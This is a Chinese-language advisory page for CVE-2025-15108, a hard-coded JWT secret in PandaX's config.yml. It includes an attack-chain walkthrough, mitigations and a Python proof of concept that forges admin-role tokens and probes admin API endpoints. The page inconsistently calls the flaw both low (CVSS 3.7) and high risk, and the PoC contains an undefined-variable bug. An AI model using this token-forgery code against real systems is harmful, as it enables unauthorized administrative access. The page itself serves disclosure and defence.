IPBUF安全漏洞报告
English
CVE-2025-15108 CVSS 3.7 低危

CVE-2025-15108 PandaX JWT Secret硬编码加密密钥漏洞

披露日期: 2025-12-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-15108
漏洞类型
硬编码凭证
CVSS评分
3.7 低危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
PandaXGO PandaX

相关标签

硬编码密钥JWT身份验证绕过PandaX凭证泄露配置安全CVE-2025-15108

漏洞概述

CVE-2025-15108是PandaXGO开源项目PandaX中的一个高危安全漏洞,该漏洞存在于JWT Secret处理组件中。攻击者可利用config.yml配置文件中的硬编码加密密钥,对使用该密钥签名的JWT令牌进行伪造,从而绕过身份验证机制。由于硬编码密钥被直接嵌入在代码或配置文件中,攻击者可以通过获取源代码或配置文件来发现这个密钥,进而生成任意有效的JWT令牌,实现对系统的未授权访问。该漏洞的利用复杂度较高,需要攻击者具备一定的技术能力,但一旦漏洞被利用,可能导致严重的身份验证绕过风险,影响系统的机密性和访问控制有效性。PandaX项目采用滚动发布模式,截至漏洞披露时(2025年12月27日),项目方尚未发布正式修复版本。

技术细节

该漏洞位于PandaX项目的JWT Secret Handler组件中,具体涉及config.yml配置文件中的key参数。攻击者通过以下方式利用此漏洞:

1. **密钥获取**:攻击者首先需要获取包含硬编码密钥的config.yml配置文件或源代码。这可以通过以下途径实现:公开的GitHub仓库代码、配置文件泄露、源码审计等方式。

2. **JWT令牌伪造**:获取硬编码密钥后,攻击者可以使用该密钥伪造任意JWT令牌。JWT(JSON Web Token)是一种常用的身份验证机制,如果签名密钥被泄露,攻击者可以创建具有任意用户名、角色和权限声明的令牌。

3. **身份验证绕过**:将伪造的JWT令牌提交给目标系统,由于系统使用相同的硬编码密钥进行验证,伪造的令牌将被视为有效令牌,攻击者即可绕过正常的身份认证流程,以任意用户身份访问系统资源。

4. **权限提升**:如果伪造的令牌包含管理员权限声明,攻击者甚至可以获得系统的完全控制权限。

漏洞的技术根源在于加密密钥应该使用强随机数生成,并存储在安全的环境变量或密钥管理服务中,而非硬编码在配置文件中。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者通过GitHub仓库、源码泄露或配置备份等方式获取PandaX项目的源代码或config.yml配置文件,从中提取硬编码的JWT密钥
STEP 2
步骤2: 密钥提取
从config.yml文件的JWT Secret Handler组件中提取key参数的值,该值被用于对所有JWT令牌进行签名验证
STEP 3
步骤3: JWT令牌构造
使用提取的硬编码密钥构造伪造的JWT令牌,设置任意的用户名、角色和权限声明(如admin权限)
STEP 4
步骤4: 身份验证绕过
将伪造的JWT令牌发送到目标API的认证端点,系统使用相同的硬编码密钥验证签名,导致伪造令牌被接受
STEP 5
步骤5: 未授权访问
成功绕过认证后,攻击者可以访问受保护的API端点,窃取敏感数据或执行特权操作
STEP 6
步骤6: 权限提升
如果伪造的令牌包含管理员角色声明,攻击者可能获得系统的完全控制权

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-15108 PoC - JWT Secret Hard-coded Key Exploitation # This PoC demonstrates how to exploit the hard-coded JWT secret vulnerability import jwt import requests import json from datetime import datetime, timedelta # Hard-coded JWT secret from config.yml (obtained from source code) # The actual key value needs to be extracted from the vulnerable config.yml file JWT_SECRET = "extracted_hard_coded_key_from_config" # Replace with actual key TARGET_URL = "http://target-server.com/api" def create_fake_jwt_token(username="admin", roles=["admin"]): """Generate a fake JWT token with custom claims""" payload = { "sub": username, "roles": roles, "iat": datetime.utcnow(), "exp": datetime.utcnow() + timedelta(days=7), "iss": "PandaX", "aud": "PandaX-API" } # Sign the token with the hard-coded secret token = jwt.encode(payload, JWT_SECRET, algorithm="HS256") return token def exploit(target_url, fake_token): """Send the fake token to the target API""" headers = { "Authorization": f"Bearer {fake_token}", "Content-Type": "application/json" } # Try to access protected endpoints endpoints = ["/api/admin/users", "/api/admin/config", "/api/protected"] for endpoint in endpoints: try: response = requests.get(f"{target_url}{endpoint}", headers=headers) print(f"[+] Request to {endpoint}: Status {response.status_code}") if response.status_code == 200: print(f" [!] Successfully authenticated as {username}!") print(f" Response: {response.text[:200]}") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") if __name__ == "__main__": # Generate fake admin token fake_token = create_fake_jwt_token("admin", ["admin", "superuser"]) print(f"[*] Generated fake JWT token: {fake_token}") # Attempt exploitation exploit(TARGET_URL, fake_token)

影响范围

PandaXGO PandaX <= fb8ff40f7ce5dfebdf66306c6d85625061faf7e5

防御指南

临时缓解措施
在官方修复版本发布之前,建议采取以下临时缓解措施:1) 立即检查生产环境中的config.yml文件,确保不包含硬编码的JWT密钥;2) 将JWT密钥替换为通过环境变量注入的强随机密钥;3) 启用JWT令牌的短期过期机制(如15-30分钟),限制令牌被盗用后的影响时间;4) 增加异常登录检测和告警机制,监控异常的JWT认证请求模式;5) 限制使用该密钥签名的令牌能够访问的API端点范围,实施最小权限原则。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表